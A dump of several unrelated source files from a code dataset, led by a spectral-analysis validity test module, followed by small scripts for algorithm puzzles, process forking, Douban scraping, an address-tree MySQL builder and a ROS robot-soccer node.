'wavelet' | 'multitaper' | 'bandfilter' | 'burst'
test : str, default: 'frequency'
Type of test to run. Options:
- 'frequency' : Tests multiple simulated oscillatory frequencies
Checks power for monotonic increase of peak freq
- 'amplitude' : Tests multiple simulated amplitudes at same freq
Checks power for monotonic increase of amplitude
- 'phase_sd': Tests multiple simulated phase std dev's (ie evoked vs induced)
Checks that power doesn't greatly vary with phase SD.
Checks that ITPC decreases monotonically with phase SD
- 'n' : Tests multiple values of number of trials (n)
Checks that power doesn't greatly vary with n.
- 'burst_rate' : Checks that oscillatory burst rate increases
as it's increased in simulated data.
test_values : array-like, shape=(n_values,), dtype=str
List of values to test. Interpretation and defaults are test-specific:
- 'frequency' : List of frequencies to test. Default: [4,8,16,32,64]
- 'amplitude' : List of oscillation amplitudes to test. Default: [1,2,5,10,20]
- 'n' : Trial numbers. Default: [25,50,100,200,400,800]
spec_type : str, default: 'power'
Type of spectral signal to return. Options: 'power' | 'itpc' (intertrial phase clustering)
do_tests : bool, default: True
Set=True to evaluate test results against expected values and raise an error if they fail
do_plots : bool, default: False
Set=True to plot test results
plot_dir : str, default: None (don't save to file)
Full-path directory to save plots to. Set=None to not save plots.
seed : int, default: 1 (reproducible random numbers)
Random generator seed for repeatable results. Set=None for fully random numbers.
- Following args set param's for sim, may be overridden by <test_values> depending on test -
amp Scalar. Simulated oscillation amplitude (a.u.) if test != 'amplitude'. Default: 5.0
freq Scalar. Simulated oscillation frequency (Hz) if test != 'frequency'. Default: 32
phi Scalar. Simulated oscillation (mean) phase (rad). Default: 0
phi_sd Scalar. Simulated oscillation phase std dev (rad). Default: 0
noise Scalar. Additive noise for simulated signal (a.u., same as amp). Default: 0.5
n Int. Number of trials to simulate if test != 'n'. Default: 1000
burst_rate Scalar. Oscillatory burst rate (bursts/trial). Default: 0 (non-bursty)
time_range Scalar. Full time range to simulate oscillation over (s). Default: 1.0
smp_rate Int. Sampling rate for simulated data (Hz). Default: 1000
**kwargs :
All other keyword args passed to spectral estimation function
Returns
-------
means : ndarray, shape=(n_freqs,n_timepts,n_values)
Estimated mean spectrogram for each tested value.
sems : ndarray, shape=(n_freqs,n_timepts,n_values)
SEM of mean spectrogram for each tested value.
passed : bool
True if all tests produce expected values; otherwise False.
"""
method = method.lower()
test = test.lower()
spec_type = spec_type.lower()
# Set defaults for tested values and set up rate generator function depending on <test>
sim_args = dict(amplitude=amp, phase=phi, phase_sd=phi_sd,
n_trials=n, noise=noise, time_range=time_range, burst_rate=burst_rate,
seed=seed)
if test in ['frequency','freq']:
test_values = [4,8,16,32,64] if test_values is None else test_values
gen_data = lambda freq: simulate_oscillation(freq,**sim_args)
elif test in ['amplitude','amp']:
test_values = [1,2,5,10,20] if test_values is None else test_values
del sim_args['amplitude'] # Delete preset arg so it uses argument to lambda below
gen_data = lambda amp: simulate_oscillation(freq,**sim_args,amplitude=amp)
elif test in ['phase','phi']:
test_values = [-pi,-pi/2,0,pi/2,pi] if test_values is None else test_values
del sim_args['phase'] # Delete preset arg so it uses argument to lambda below
gen_data = lambda phi: simulate_oscillation(freq,**sim_args,phase=phi)
elif test in ['phase_sd','phi_sd']:
test_values = [pi, pi/2, pi/4, 0] if test_values is None else test_values
del sim_args['phase_sd'] # Delete preset arg so it uses argument to lambda below
gen_data = lambda phi_sd: simulate_oscillation(freq,**sim_args,phase_sd=phi_sd)
elif test in ['n','n_trials']:
test_values = [25,50,100,200,400,800] if test_values is None else test_values
del sim_args['n_trials'] # Delete preset arg so it uses argument to lambda below
gen_data = lambda n: simulate_oscillation(freq,**sim_args,n_trials=n)
elif test in ['burst_rate','burst']:
test_values = [0.1,0.2,0.4,0.8] if test_values is None else test_values
del sim_args['burst_rate'] # Delete preset arg so it uses argument to lambda below
gen_data = lambda rate: simulate_oscillation(freq,**sim_args,burst_rate=rate)
else:
raise ValueError("Unsupported value '%s' set for <test>" % test)
# Ensure hand-set values are sorted (ascending), as many tests assume it
test_values = sorted(test_values)
n_values = len(test_values)
# Set default parameters for each spectral estimation method
do_burst = method in ['burst','burst_analysis']
do_itpc = spec_type == 'itpc'
# Special case: oscillatory burst analysis
if do_burst:
# KLUDGE Reset spectral analysis <method> to 'wavelet' (unless set explicitly in kwargs)
if 'bands' not in kwargs: kwargs['bands'] = ((2,6),(6,10),(10,22),(22,42),(42,86))
elif method == 'multitaper':
if 'freq_range' not in kwargs: kwargs['freq_range'] = [1,100]
elif method == 'bandfilter':
if 'freqs' not in kwargs: kwargs['freqs'] = ((2,6),(6,10),(10,22),(22,42),(42,86))
if ('buffer' not in kwargs) and (method != 'multitaper'): kwargs['buffer'] = 1.0
if do_itpc:
if 'itpc_method' not in kwargs: kwargs['itpc_method'] = 'PLV'
kwargs['trial_axis'] = 1
spec_fun = itpc if do_itpc else power_spectrogram
for i,value in enumerate(test_values):
# print("Running test value %d/%d: %.2f" % (i+1,n_values,value))
# Simulate data with oscillation of given params -> (n_timepts,n_trials)
data = gen_data(value)
# HACK Convert continuous oscillatory data into spike train (todo find better method)
if spikes:
data = (data - data.min()) / data.ptp() # Convert to 0-1 range ~ spike probability
data = data**2 # Sparsify probabilies (decrease rates)
# Use probabilities to generate Bernoulli random variable at each time point
data = bernoulli.ppf(0.5, data).astype(bool)
spec,freqs,timepts = spec_fun(data,smp_rate,axis=0,method=method,**kwargs)
if freqs.ndim == 2:
bands = freqs
freqs = freqs.mean(axis=1) # Compute center of freq bands
if do_itpc: n_freqs,n_timepts = spec.shape
else: n_freqs,n_timepts,n_trials = spec.shape
# KLUDGE Initialize output arrays on 1st loop, once spectrogram output shape is known
if i == 0:
means = np.empty((n_freqs,n_timepts,n_values))
sems = np.empty((n_freqs,n_timepts,n_values))
# Compute across-trial mean and SEM of time-frequency data -> (n_freqs,n_timepts,n_values)
if not do_itpc:
means[:,:,i] = spec.mean(axis=2)
sems[:,:,i] = spec.std(axis=2,ddof=0) / sqrt(n_trials)
# HACK ITPC by definition already reduced across trials, so just copy results into "means"
else:
means[:,:,i] = spec
sems[:,:,i] = 0
# Compute mean across all timepoints -> (n_freqs,n_values) frequency marginal
marginal_means = means.mean(axis=1)
marginal_sems = sems.mean(axis=1)
# For bandfilter, plot frequency bands in categorical fashion
if do_burst or (method == 'bandfilter'):
freq_transform = lambda x: np.argmin(np.abs(x - freqs)) # Index of closest sampled freq
plot_freqs = np.arange(n_freqs)
freq_ticks = np.arange(n_freqs)
freq_tick_labels= bands
# For wavelets, evaluate and plot frequency on log scale
elif method == 'wavelet':
freq_transform = np.log2
plot_freqs = freq_transform(freqs)
fmin = ceil(log2(freqs[0]))
fmax = floor(log2(freqs[-1]))
freq_ticks = np.arange(fmin,fmax+1)
freq_tick_labels= 2**np.arange(fmin,fmax+1)
# For multitaper, evaluate and plot frequency on linear scale
elif method == 'multitaper':
freq_transform = lambda x: x
plot_freqs = freqs
fmin = ceil(freqs[0]/10.0)*10.0
fmax = floor(freqs[-1]/10.0)*10.0
freq_ticks = np.arange(fmin,fmax+1,10).astype(int)
freq_tick_labels= freq_ticks
freqs_transformed = np.asarray([freq_transform(f) for f in freqs])
# For frequency test, find frequency with maximal power for each test
if test in ['frequency','freq']:
idxs = np.argmax(marginal_means,axis=0)
peak_freqs = freqs[idxs] if not(do_burst or (method == 'bandfilter')) else idxs
# Find frequency in spectrogram closest to each simulated frequency
test_freq_idxs = np.asarray([np.argmin(np.abs(freq_transform(f) - freqs_transformed))
for f in test_values])
# Extract mean,SEM of power at each tested frequency
test_freq_means = marginal_means[test_freq_idxs,np.arange(n_values)]
test_freq_errs = marginal_sems[test_freq_idxs,np.arange(n_values)]
else:
# Find frequency in spectrogram closest to simulated frequency
test_freq_idx = np.argmin(np.abs(freq_transform(freq) - freqs_transformed))
# Extract mean,SEM of power at tested frequency
test_freq_means = marginal_means[test_freq_idx,:]
test_freq_errs = marginal_sems[test_freq_idx,:]
# Plot summary of test results
if do_plots:
dt = np.diff(timepts).mean()
tlim = [timepts[0]-dt/2, timepts[-1]+dt/2]
df = np.diff(plot_freqs).mean()
flim = [plot_freqs[0]-df/2, plot_freqs[-1]+df/2]
# # Plot spectrogram for each tested value
# plt.figure()
# n_subplots = [floor(n_values/2), ceil(n_values/floor(n_values/2))]
# for i,value in enumerate(test_values):
# ax = plt.subplot(n_subplots[0],n_subplots[1],i+1)
# plt.grid(axis='both',color=[0.75,0.75,0.75],linestyle=':')
# target_freq = freq_transform(value) if test in ['frequency','freq'] else \
# freq_transform(freq)
# if not (do_burst or (method == 'bandfilter')):
# plt.plot(tlim, [target_freq,target_freq], '-', color='r', linewidth=0.5)
# plt.imshow(means[:,:,i], extent=[*tlim,*flim], aspect='auto', origin='lower')
# if i in [0,n_subplots[1]]:
# plt.yticks(freq_ticks,freq_tick_labels)
# else:
# ax.set_xticklabels([])
# plt.yticks(freq_ticks,[])
# plt.title(np.round(value,decimals=2))
# plt.colorbar()
# plt.show()
# if plot_dir is not None:
# filename = 'power-spectrogram-%s-%s-%s.png' % (kwargs['itpc_method'],method,test) \
# if do_itpc else 'power-spectrogram-%s-%s.png' % (method,test)
# plt.savefig(os.path.join(plot_dir,filename))
# Plot time-averaged spectrum for each tested value
plt.figure()
colors = plt.rcParams['axes.prop_cycle'].by_key()['color']
ylim = [0,1.05*marginal_means.max()]
for i,value in enumerate(test_values):
plt.plot(plot_freqs, marginal_means[:,i], '.-', color=colors[i], linewidth=1.5)
target_freq = freq_transform(value) if test in ['frequency','freq'] else \
freq_transform(freq)
if not (do_burst or (method == 'bandfilter')):
plt.plot([target_freq,target_freq], ylim, '-', color=colors[i], linewidth=0.5)
plt.text(0.9*flim[1], (0.95-i*0.05)*ylim[1], value, color=colors[i], fontweight='bold')
plt.xlim(flim)
plt.ylim(ylim)
plt.xticks(freq_ticks,freq_tick_labels)
plt.grid(axis='both',color=[0.75,0.75,0.75],linestyle=':')
plt.xlabel('Frequency (Hz)')
plt.ylabel(spec_type)
plt.title("%s %s test" % (method,test))
plt.show()
if plot_dir is not None:
filename = 'power-spectrum-%s-%s-%s.png' % (kwargs['itpc_method'],method,test) \
if do_itpc else 'power-spectrum-%s-%s.png' % (method,test)
plt.savefig(os.path.join(plot_dir,filename))
# Plot summary curve of power (or peak frequency) vs tested value
plt.figure()
ax = plt.subplot(1,1,1)
plt.grid(axis='both',color=[0.75,0.75,0.75],linestyle=':')
if test in ['frequency','freq']:
lim = (0,1.1*freq_transform(test_values[-1]))
plt.plot(lim, lim, color='k', linewidth=0.5)
if do_burst or (method == 'bandfilter'):
plt.plot([freq_transform(f) for f in test_values], peak_freqs, marker='o')
else:
plt.plot([freq_transform(f) for f in test_values],
[freq_transform(f) for f in peak_freqs], marker='o')
plt.xticks(freq_ticks,freq_tick_labels)
plt.yticks(freq_ticks,freq_tick_labels)
plt.xlim(lim)
plt.ylim(lim)
ax.set_aspect('equal', 'box')
else:
plt.errorbar(test_values, test_freq_means, 3*test_freq_errs, marker='o')
plt.xlabel(test)
plt.ylabel('frequency' if test in ['frequency','freq'] else spec_type)
plt.title("%s %s test" % (method,test))
plt.show()
if plot_dir is not None:
filename = 'power-summary-%s-%s-%s.png' % (kwargs['itpc_method'],method,test) \
if do_itpc else 'power-summary-%s-%s.png' % (method,test)
plt.savefig(os.path.join(plot_dir,filename))
## Determine if test actually produced the expected values
# frequency test: check if frequency of peak power matches simulated target frequency
if test in ['frequency','freq']:
evals = [((np.diff(peak_freqs) >= 0).all(),
"Estimated peak freq does not increase monotonically with expected freq")]
# 'amplitude' : Test if power increases monotonically with simulated amplitude
elif test in ['amplitude','amp']:
if spec_type == 'power':
evals = [((np.diff(test_freq_means) > 0).all(),
"Estimated power doesn't increase monotonically with simulated amplitude")]
else:
evals = {}
# 'phase' : Test if power is ~ constant across phase
elif test in ['phase','phi']:
crit = 0.2 if do_itpc else test_freq_errs.max()
evals = [(test_freq_means.ptp() < crit,
"Estimated %s has larger than expected range across different simulated phases"
% spec_type)]
# 'phase_sd' : Test if power is ~ constant across phase SD;
# Test if ITPC decreases monotonically with it
elif test in ['phase_sd','phi_sd']:
if do_itpc:
evals = [((np.diff(test_freq_means) < 0).all(),
"Estimated ITPC does not decrease monotonically with simulated phase SD")]
else:
evals = [(test_freq_means.ptp() < test_freq_errs.max(),
"Estimated %s has larger than expected range across simulated phase SDs"
% spec_type)]
# 'n' : Test if power is ~ same for all values of n (unbiased by n)
elif test in ['n','n_trials']:
crit = 0.2 if do_itpc else test_freq_errs.max()
evals = [(test_freq_means.ptp() < crit,
"Estimated %s has larger than expected range across n's (likely biased by n)"
% spec_type)]
# 'burst_rate': Test if measured burst rate increases monotonically with simulated burst rate
elif test in ['burst_rate','burst']:
evals = [((np.diff(test_freq_means) > 0).all(),
"Estimated burst rate does not increase monotonic with simulated burst rate")]
passed = True
for cond,message in evals:
if not cond: passed = False
# Raise an error for test fails if do_tests is True
if do_tests: assert cond, AssertionError(message)
# Just issue a warning for test fails if do_tests is False
elif not cond: warn(message)
return means, sems, passed
def power_test_battery(methods=('wavelet','multitaper','bandfilter'),
tests=('frequency','amplitude','phase','phase_sd','n','burst_rate'),
do_tests=True, **kwargs):
"""
Run a battery of given tests on given oscillatory power computation methods
Parameters
----------
methods : array-like of str, default: ('wavelet','multitaper','bandfilter') (all supported)
List of power computation methods to test.
tests : array-like of str, default: ('frequency','amplitude','phase','phase_sd','n','burst_rate')
List of tests to run.
do_tests : bool, default: True
Set=True to evaluate test results against expected values and raise an error if they fail.
**kwargs :
Any other keyword args passed directly to test_power()
"""
if isinstance(methods,str): methods = [methods]
if isinstance(tests,str): tests = [tests]
for test in tests:
for method in methods:
print("Running %s test on %s spectral analysis" % (test,method))
extra_args = kwargs
if (method in ['burst','burst_analysis']) and ('burst_rate' not in kwargs):
extra_args['burst_rate'] = 0.4
t1 = time.time()
_,_,passed = test_power(method, test=test, do_tests=do_tests, **extra_args)
print('%s (test ran in %.1f s)' % ('PASSED' if passed else 'FAILED', time.time()-t1))
# If saving plots to file, let's not leave them all open
if 'plot_dir' in kwargs: plt.close('all')
def itpc_test_battery(methods=('wavelet','multitaper','bandfilter'),
tests=('frequency','amplitude','phase','phase_sd','n'),
itpc_methods=('PLV','Z','PPC'), do_tests=True, **kwargs):
"""
Run a battery of given tests on given intertrial phase clustering computation methods
Parameters
----------
methods : array-like, default: ('wavelet','multitaper','bandfilter') (all supported methods)
List of power computation methods to test.
tests : array-like, default: ('frequency','amplitude','phase','phase_sd','n') (all supported)
List of tests to run.
itpc_method : array-like, default: ('PLV','Z','PPC') (all supported options)
List of methods to use for computing intertrial phase clustering
do_tests : bool, default: True
Set=True to evaluate test results against expected values and raise an error if they fail.
**kwargs :
Any other keyword args passed directly to test_power()
"""
if isinstance(methods,str): methods = [methods]
if isinstance(tests,str): tests = [tests]
# Default phase SD = 90 deg unless set otherwise
phi_sd = kwargs.pop('phi_sd',pi/4)
for test in tests:
for itpc_method in itpc_methods:
for method in methods:
print("Running %s test on %s %s" % (test,method,itpc_method))
extra_args = kwargs
t1 = time.time()
_,_,passed = test_power(method, test=test, itpc_method=itpc_method,
spec_type='itpc', phi_sd=phi_sd, do_tests=do_tests,
**extra_args)
print('%s (test ran in %.1f s)'
% ('PASSED' if passed else 'FAILED', time.time()-t1))
# If saving plots to file, let's not leave them all open
if 'plot_dir' in kwargs: plt.close('all')
| sbrincat/spynal | spynal/tests/validity_test_spectra.py | validity_test_spectra.py | py | 22,439 | python | en | code | 8 | github-code | 90 |
18544103939 | from itertools import accumulate
N, C, *xv = map(int, open(0).read().split())
xv = [(x, v) for x, v in zip(*[iter(xv)] * 2)]
cw_acc = [0] * (N + 1)
ccw_acc = [0] * (N + 1)
cw_prev = 0
ccw_prev = C
for i in range(N):
k = N - i - 1
cw_acc[i + 1] = cw_acc[i] + xv[i][1] - (xv[i][0] - cw_prev)
cw_prev = xv[i][0]
ccw_acc[i + 1] = ccw_acc[i] + xv[k][1] - (ccw_prev - xv[k][0])
ccw_prev = xv[k][0]
cw_acc = list(accumulate(cw_acc, max))
ccw_acc = list(accumulate(ccw_acc, max))
ans = 0
for i in range(N):
k = N - i - 1
ans = max(
ans,
cw_acc[i + 1],
cw_acc[i + 1] - xv[i][0] + ccw_acc[k],
ccw_acc[i + 1],
ccw_acc[i + 1] - (C - xv[k][0]) + cw_acc[k],
)
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p03372/s580983874.py | s580983874.py | py | 733 | python | en | code | 0 | github-code | 90 |
29718441946 | # 多进程修改全局变量
"""
多个进程中,每个进程中所有数据(包括全局变量)都各自拥有一份,互不影响。
想要完成进程间的数据共享,需要一些方法:命名管道/无名管道/共享内存/消息队列/网络等
"""
import os
import time
g_num=100
ret=os.fork()
if ret==0:
print("-------process-1-------")
g_num+=1
print("-------process-1 g_num=%d---"%g_num)
else:
time.sleep(3)
print("-------process-2-------")
print("-------process-2 g_num=%d---"%g_num)
| DorisBian/projectGit | pythonPractice/SystemProgramming-Process/ModifyGlobalVariable.py | ModifyGlobalVariable.py | py | 527 | python | zh | code | 0 | github-code | 90 |
18465959439 | def solve():
N = int(input())
P = list(map(float, input().split()))
dp = [[0]*(N+1) for _ in range(N+1)]
dp[0][0] = 1
for i in range(1,N+1):
for j in range(i+1):
dp[i][j] = dp[i-1][j-1]*P[i-1]+dp[i-1][j]*(1-P[i-1])
ans = sum(dp[-1][N//2+1:])
return ans
print(solve()) | Aasthaengg/IBMdataset | Python_codes/p03168/s798372895.py | s798372895.py | py | 291 | python | en | code | 0 | github-code | 90 |
19981795802 | import urllib.request as urr
import json
import urllib.parse as urp
import time
data={}
def getmovies(data):
print("dssd")
data['cover']="https://img3.doubanio.com/view/photo/s_ratio_poster/public/p2518852413.jpg"
data['cover_x']='960'
data['cover_y']='1500'
data['id']="26997663"
data['is_new']=False
data['playable']=True
data['rate']="6.3"
data['title']="寂静之地"
data['url']="https://movie.douban.com/subject/26997663/"
print(data)
url = 'https://movie.douban.com/j/search_subjects?type=movie&tag=%E6%81%90%E6%80%96&sort=recommend&page_limit=20&page_start=0'
data = urp.urlencode(data).encode('utf-8')
response = urr.urlopen(url,data)
html = response.read().decode('utf-8')
target = json.loads(html)
if __name__ == '__main__':
getmovies(data)
| yaunsine/Python3 | catch_translate.py | catch_translate.py | py | 860 | python | en | code | 1 | github-code | 90 |
43213375624 | # 220413 해결
# 마지막 s 크기가 <= 100000일때는 실패. 시간초과인듯.
# c++로 구현해야 하나? 다른 방법이 있을까?
# --> 딕셔너리로 t 배열 자리의 알파벳마다 숫자 정해놓고, s에서 글자마다 t에 있는 인덱스를 찾아보기
# 그러다 인덱스 크기가 이전 자리의 인덱스보다 작거나 같으면 n += 1
# 딕셔너리 인덱스 찾아가는 속도가 O(1)일때 총 시간복잡도는 O(n)
s = input()
t = input()
success = 1
n = 1
alphabets_index_t = dict()
if set(s) - set(t): # t에 없는 단어가 s에 있다면 성공할 수 없음.
success = 0
if success:
for i, word in enumerate(t):
if word not in alphabets_index_t:
alphabets_index_t[word] = i
index_s = 1
while index_s < len(s):
if alphabets_index_t[s[index_s-1]] >= alphabets_index_t[s[index_s]]: # s[index_s-1]글자가 t에 있는 s[index_s]보다 뒤에 있다면 1번 더 돌아야함.
n += 1
index_s += 1
print(n)
else:
print(-1) | siejwkaodj/Problem-Solve | Baekjoon/KOI_highschool/20191_줄임말.py | 20191_줄임말.py | py | 1,049 | python | ko | code | 1 | github-code | 90 |
19276867926 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
@project: AddressTreeBuilder
@author: Jian Sheng
@file: BuildTreeByID.py
@ide: PyCharm
@TIME: 2019-01-10 11:18:19
"""
from __future__ import unicode_literals # at top of module
from __future__ import division, print_function, with_statement
import uuid
import pymysql
import datetime
import traceback
from binarySearching import binary_Searching
class TreeNode(object):
"""The basic node of tree structure"""
def __init__(self, name, parent=None):
super(TreeNode, self).__init__()
self.name = name
self.parent = parent
self.id = ''
self.parentID = ''
self.type = ''
self.child = {}
def __repr__(self):
return 'TreeNode(%s)' % self.name
def __contains__(self, item):
return item in self.child
def __len__(self):
"""return number of children node"""
return len(self.child)
def __bool__(self, item):
"""always return True for exist node"""
return True
@property
def path(self):
"""return path string (from root to current node)"""
if self.parent:
return '%s %s' % (self.parent.path.strip(), self.name)
else:
return self.name
def get_child(self, name, defval=None):
"""get a child node of current node"""
return self.child.get(name, defval)
# add childNode by Name,return childNode
def add_child(self, name, id, obj=None):
"""add a child node to current node"""
if obj and not isinstance(obj, TreeNode):
raise ValueError('TreeNode only add another TreeNode obj as child')
if obj is None:
obj = TreeNode(name)
obj.parent = self
obj.parentID = self.id
obj.id = id
self.child[name] = obj
return obj
def del_child(self, name):
"""remove a child node from current node"""
if name in self:
del self.child[name]
def create_child(self, path, create=False, cursor=None, sql='', zuobiao=''):
"""find child node by path/name, return None if not found"""
# convert path to a list if input is a string
path = path if isinstance(path, list) else path.split()
cur = self
index = 0
while '' in path or ' ' in path:
path.remove('')
path.remove(' ')
length = len(path)
for sub in path:
# search子节点
if sub == '镇江市':
obj = self
else:
obj = cur.get_child(sub)
# create子节点
if obj is None and create:
# create new node if need
obj = cur.add_child(name=sub, id=uuid.uuid1())
#type = searchType(index=index, length=length, nodeName=sub, parentType=cur.type)
type = searchType(index=index, nodeName=sub)
# if int(type) > 50:
# ins = sql % (obj.id, obj.parentID, sub, type, zuobiao)
# else:
# ins = sql % (obj.id, obj.parentID, sub, type, '')
if type == '19d219f15efe4408892c2f955e439489':
ins = sql % (obj.id, obj.parentID, sub, type, zuobiao)
else:
ins = sql % (obj.id, obj.parentID, sub, type, '')
obj.type = type
cursor.execute(ins)
# check if search done
if obj is None:
break
cur = obj
index += 1
return obj
def build_tree_by_id(self,resultList):
"""通过地址元素树将地址挂到内存"""
root = self
if root is not None:
while True:
index = binary_Searching(alist=resultList, data=root.id)
if resultList[index][1] == root.id:
cur = root.add_child(name=resultList[index][2], id=resultList[index][0])
resultList.pop(index)
cur.build_tree_by_id(resultList)
else:
break
return resultList
def numberOfLeafs(self):
"""查找某节点下叶子节点的个数"""
root = self
nodes = 0
if root == None:
return 0
elif root.child == {}:
return 1
else:
for key in root.child:
nodes = nodes + root.child[key].numberOfLeafs()
return nodes
def items(self):
return self.child.items()
def dump_tree_on_txt(self, fw, indent=0):
"""在文件中打印形象树"""
tab = ' '*(indent-1) + ' |- ' if indent > 0 else ''
print('%s%s' % (tab, self.name))
tree = '%s%s' % (tab, self.name) + '\n'
fw.write(tree)
for name, obj in self.items():
obj.dump(fw=fw, indent=indent+1)
def dump_tree_on_console(self, indent=0):
"""控制台打印形象树"""
tab = ' '*(indent-1) + ' |- ' if indent > 0 else ''
print('%s%s' % (tab, self.name))
for name, obj in self.items():
obj.dump_tree_on_console(indent+1)
def build_path(self, fw, parentTree=''):
"""打印地址树,校验用"""
#print('%s' % (self.name))
treeNodeName = '%s' % (self.name)
if self.name != '陕西省':
_tree = parentTree + treeNodeName
else:
_tree = '陕西省'
if self.child == {}:
_tree += '\n'
fw.write(_tree)
for name, obj in self.items():
obj.build_path(fw=fw, parentTree=_tree)
def querySQL(sql = ''):
db = pymysql.connect("localhost", "root", "123456", "test")
try:
cursor = db.cursor()
cursor.execute(sql)
resultSet = cursor.fetchall()
db.commit()
except Exception as e:
# Rollback in case there is any error
print(e)
db.rollback()
cursor.close()
db.close()
return resultSet
def searchType1(index, length, nodeName, parentType):
if nodeName == '陕西省':
return '0'
elif nodeName == '铜川市':
return '14'
elif nodeName == '王益区' or nodeName == '耀州区' or nodeName == '宜君县' or nodeName == '印台区' or nodeName == '新区':
return '15'
elif '镇' in nodeName or '乡' in nodeName or '街道' in nodeName:
return '20'
elif '路' in nodeName or '巷' in nodeName or ('街' in nodeName and '道' not in nodeName):
return '41'
elif '村' in nodeName:
return '43'
elif '组' in nodeName:
return '34'
elif '号' in nodeName and int(parentType)<50:
return '100'
elif '栋' in nodeName or '幢'in nodeName or ('楼' in nodeName and index<length-1 and int(parentType)>50):
return '102'
elif '单元' in nodeName:
return '51'
elif ('号' in nodeName or '层' in nodeName or '楼' in nodeName) and index == length-1:
return '53'
else:
return '41'
def searchType(index, nodeName):
if index == 1 and '区' in nodeName:
return '19d201f15efe4408892c2f955e439489'
if index == 1 and '县' in nodeName:
return '19d202f15efe4408892c2f955e439489'
if index== 2 and '街道'in nodeName:
return '19d206f15efe4408892c2f955e439489'
if index == 2 and '镇' in nodeName:
return '19d205f15efe4408892c2f955e439489'
if index == 2 and '乡' in nodeName:
return '19d204f15efe4408892c2f955e439489'
if index== 3:
return '19d213f15efe4408892c2f955e439489'
if index == 4:
return '19d219f15efe4408892c2f955e439489'
if index == 5:
return '19d221f15efe4408892c2f955e439489'
"""制定排序规则"""
def orderByIndex(elem):
return elem[1]
if __name__ == '__main__':
startTime = datetime.datetime.now()
print('-----------------Start build tree from dzys-------------------------------')
selectSQL = 'select id,shangjiyuansu,dizhiyuansumingcheng from sd_dz_dizhiyuansu order by shangjiyuansu asc'
db = pymysql.connect(host="localhost", port=3307, user="root", passwd="123456", db="sd_dmdzk_zjmz", charset='utf8')
cursor = db.cursor()
cursor.execute(selectSQL)
resultSet = cursor.fetchall()
resultList = list(resultSet)
resultList.sort(key=orderByIndex)
root = TreeNode(name='镇江市')
root.id = '73B091DD20C149D780326C5695519897'
print('正在加载...')
root.build_tree_by_id(resultList)
print('----------------End build tree!-------------------------------------------\r\n')
f = open("镇江纸质地址树.txt", "a", encoding="utf-8")
print('----------------Start build path!------------------------------------------')
print('正在创建...')
root.build_path(fw=f)
print('----------------End build path!-------------------------------------------')
f.flush()
f.close()
endTime = datetime.datetime.now()
print(endTime - startTime)
print(resultList)
# starttime = datetime.datetime.now()
# print('hello')
# selectSQL = 'select * from ruku order by lat DESC'
# insertSQL = """insert into sd_dz_dizhiyuansu_0225(id,shangjiyuansu,dizhiyuansumingcheng,dizhiyuansuleixing,zuobiao,zhuangtai) values('%s','%s','%s','%s','%s',2)"""
# sel = 'select id,shangjiyuansu,dizhiyuansumingcheng from sd_dz_dizhiyuansu_0225 order by shangjiyuansu '
#
# db = pymysql.connect(host="localhost", port=3307, user="root", passwd="123456", db="sd_dmdzk_zjmz", charset='utf8')
# cursor = db.cursor()
# cursor.execute(sel)
# result = cursor.fetchall()
# resList = list(result)
# root = TreeNode(name='镇江市')
# root.id = '73B091DD20C149D780326C5695519897'
# root.build_tree_by_id(resList)
# #root.dump_tree_on_console()
#
# cursor.execute(selectSQL)
# resultSet = cursor.fetchall()
#
#
# count = 0
# for addre in resultSet:
# try:
# addrList = list(addre)
# latlng = '{"lat":' + addrList[0] + ',"lng":' + addrList[1] + '}' if addrList[0] != '' else ''
# addr = addrList[2:]
# obj = root.create_child(path=addr, create=True, cursor=cursor, sql=insertSQL, zuobiao=latlng)
# except Exception as e:
# # Rollback in case there is any error
# print(e)
# db.rollback()
# f = open("log.txt", 'a')
# traceback.print_exc(file=f)
# f.flush()
# f.close()
# count += 1
# log = '第' + str(count) + '条打完了'
# print(log)
# db.commit()
# cursor.close()
# db.close()
# endtime = datetime.datetime.now()
# print(endtime - starttime)
| Jack-Sheng/AddressTreeBuilder | BuildTreeByID.py | BuildTreeByID.py | py | 10,795 | python | en | code | 0 | github-code | 90 |
71573576298 | #! /usr/bin/env python3
import rospy # Importamos el módulo rospy para interactuar con ROS
from geometry_msgs.msg import Twist # Importamos el mensaje Twist para el control de movimiento
from grsim_ros_bridge_msgs.msg import SSL # Importamos el mensaje SSL para la comunicación con grSim
from krssg_ssl_msgs.msg import SSL_DetectionFrame, SSL_DetectionBall # Importamos los mensajes relacionados con la detección de robots y balón
import math # Importamos el módulo math para realizar operaciones matemáticas
from jugador import Jugador
ball = SSL_DetectionBall() # Creamos una instancia del mensaje SSL_DetectionBall
golero = Jugador('golero')
defensaIzquierda= Jugador('defensaIzquierda')
defensaDerecho = Jugador('defensaDerecho')
atacante1 = Jugador('atacante1')
atacante2 = Jugador('atacante2')
def vision_callback(data):
global ball, golero, defensaIzquierda, defensaDerecho, atacante1, atacante2
ball = data.balls # Actualizamos la información del balón
# Recorremos la lista de robots azules detectados en el marco de detección
if len(data.robots_blue) > 0:
for robot in data.robots_blue:
if robot.robot_id == 0:
golero.set_ubicacion(robot.pixel_x, robot.pixel_y) # Actualizamos la información del robot 0
golero.set_orientacion(robot.orientation)
if robot.robot_id == 1:
defensaIzquierda.set_ubicacion(robot.pixel_x, robot.pixel_y) # Actualizamos la información del robot 1
defensaIzquierda.set_orientacion(robot.orientation)
if robot.robot_id == 2:
defensaDerecho.set_ubicacion(robot.pixel_x, robot.pixel_y) # Actualizamos la información del robot 2
defensaDerecho.set_orientacion(robot.orientation)
if robot.robot_id == 3:
atacante1.set_ubicacion(robot.pixel_x, robot.pixel_y) # Actualizamos la información del robot 3
atacante1.set_orientacion(robot.orientation)
if robot.robot_id == 4:
atacante2.set_ubicacion(robot.pixel_x, robot.pixel_y) # Actualizamos la información del robot 4
atacante2.set_orientacion(robot.orientation)
if __name__ == "__main__":
rospy.init_node("grsim_pria", anonymous=False) # Inicializamos el nodo ROS con el nombre "grsim_pria"
rospy.Subscriber("/vision", SSL_DetectionFrame, vision_callback) # Nos suscribimos al tópico "/vision" para recibir los marcos de detección
golero.publisher= rospy.Publisher("/robot_blue_0/cmd", SSL, queue_size=10) # Creamos un publicador para enviar comandos al robot 0 azul
defensaIzquierda.publisher= rospy.Publisher("/robot_blue_1/cmd", SSL, queue_size=10)
defensaDerecho.publisher= rospy.Publisher("/robot_blue_2/cmd", SSL, queue_size=10)
atacante1.publisher= rospy.Publisher("/robot_blue_3/cmd", SSL, queue_size=10)
atacante2.publisher= rospy.Publisher("/robot_blue_4/cmd", SSL, queue_size=10)
